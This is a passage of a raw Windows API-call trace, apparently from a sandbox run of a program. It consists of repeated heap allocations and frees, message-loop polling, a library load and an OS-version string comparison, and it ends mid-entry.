RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.307] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.307] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.308] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.310] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.311] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.312] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.313] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.313] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0264.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0264.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.314] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 1 [0264.314] TranslateMessage (lpMsg=0x8bf250) returned 0 [0264.314] DispatchMessageW (lpMsg=0x8bf250) returned 0x0 [0264.314] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0264.314] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0264.315] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.315] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.317] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0264.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.318] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.320] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0264.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.320] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.322] PeekMessageW (in: 